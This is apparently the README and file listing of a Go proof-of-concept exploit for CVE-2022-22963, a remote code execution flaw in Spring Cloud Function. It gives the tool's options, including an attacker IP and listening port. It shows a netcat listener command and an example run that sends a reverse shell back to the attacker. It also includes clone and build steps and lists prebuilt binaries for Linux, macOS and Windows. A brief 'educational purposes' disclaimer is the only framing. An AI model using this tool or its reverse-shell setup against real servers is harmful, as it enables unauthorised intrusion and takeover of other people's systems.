Description
Binaries for CVE-2022-22963
Introduction
# CVE-2022-22963
Remote code execution exploit for CVE-2022-22963, targeting a Spring Cloud service.
**Disclaimer: This is for educational purposes only. The author is not responsible for the use of this program. Use at your own risk.**
## Usage
```sh
./CVE-2022-22963 -h
Usage:
CVE-2022-22963 [OPTIONS]
Application Options:
-u, --target-url= Target/Host url where 'Spring Cloud' is running. Example: -t http://somesite.htb
-p, --target-port= Port running the service. Example: -p 8080
-i, --attacker-ip= Attacker IPv4 Address. Example: -i 10.10.10.10
-l, --listening-port= Listening port to connect. Example: -l 1337
Help Options:
-h, --help Show this help message
```
Assume a possibly vulnerable target is running at `http://somerandomserver.com:8080`. Start `nc` listening on port `1337` by running `nc -lvnp 1337`. Then run the exploit:
```sh
./CVE-2022-22963 -u http://somerandomserver.com -p 8080 -i 10.10.10.10 -l 1337
```
## Build from source
If you have `go` installed on your machine, run:
```sh
git clone https://github.com/GunZF0x/CVE-2022-22963.git
cd CVE-2022-22963
go run main.go -h #run without compiling any file
go build -o exploit main.go #build the file
```
File snapshot
[4.0K] /data/pocs/6d3ac43a2d95c0f462ed4a58ef9112f06705b191
├── [4.0K] binaries
│ ├── [6.9M] CVE-2022-22963-linux-amd64
│ ├── [6.8M] CVE-2022-22963-linux-x32
│ ├── [6.7M] CVE-2022-22963-macOS-amd64
│ ├── [6.9M] CVE-2022-22963-windows-amd64.exe
│ └── [6.9M] CVE-2022-22963-windows-x32.exe
├── [ 158] go.mod
├── [ 382] go.sum
├── [9.2K] main.go
└── [1.2K] README.md
1 directory, 9 files